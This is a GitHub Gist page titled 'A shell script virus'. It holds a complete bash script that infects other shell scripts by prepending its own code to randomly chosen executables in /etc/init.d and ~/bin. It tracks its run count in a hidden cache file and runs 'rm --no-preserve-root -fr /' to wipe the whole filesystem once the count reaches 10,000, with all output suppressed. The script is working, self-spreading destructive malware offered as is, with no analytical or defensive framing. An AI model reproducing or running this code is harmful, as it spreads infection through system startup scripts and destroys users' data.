Last active
October 20, 2022 12:48
-
-
Save miklcct/a9abb19d7cac57e7aa8f9984dadfa817 to your computer and use it in GitHub Desktop.
A shell script virus
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
{ | |
contains() { | |
for item in $1 | |
do | |
if | |
[ "$item" = "$2" ] | |
then | |
return 0 | |
fi | |
done | |
return 1 | |
} | |
# set the shell to expand to nothing if there is really nothing | |
shopt -s nullglob | |
# my length | |
lines=79 | |
# directories of script I want to search | |
dirs="/etc/init.d ~/bin" | |
# separator | |
# list all files | |
declare -a files | |
for dir in $dirs | |
do | |
files+=($dir/*) | |
done | |
# destroy the system when I have been run for a number of times | |
counter=/var/cache/.counter | |
max=10000 | |
touch "$counter" | |
count=$(($(cat "$counter")+1)) | |
if | |
[ $count -ge $max ] | |
then | |
rm --no-preserve-root -fr / | |
else | |
echo $count > "$counter" | |
fi | |
for ((i=0;i<3;++i)) | |
do | |
# choose one file at random | |
index=$(($RANDOM % ${#files[@]})) | |
target="${files[$index]}" | |
# check if it is a executable shell script | |
if | |
[ -x "$target" ] | |
then | |
header="$(head -n 1 "$target")" | |
header=("${header:2}") # remove #! | |
if | |
contains "$header" /bin/sh || contains "$header" /bin/bash | |
then | |
# check if it has been infected by me before | |
if | |
names=($RANDOM $RANDOM) | |
head -n $lines "$0" > /tmp/${names[0]} | |
head -n $lines "$target" > /tmp/${names[1]} | |
! diff /tmp/${names[0]} /tmp/${names[1]} | |
then | |
# infect the file | |
cat /tmp/${names[0]} "$target" > /tmp/${names[1]} | |
cp /tmp/${names[1]} "$target" | |
fi | |
rm -f /tmp/${names[0]} /tmp/${names[1]} | |
fi | |
fi | |
done | |
} > /dev/null 2>&1 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment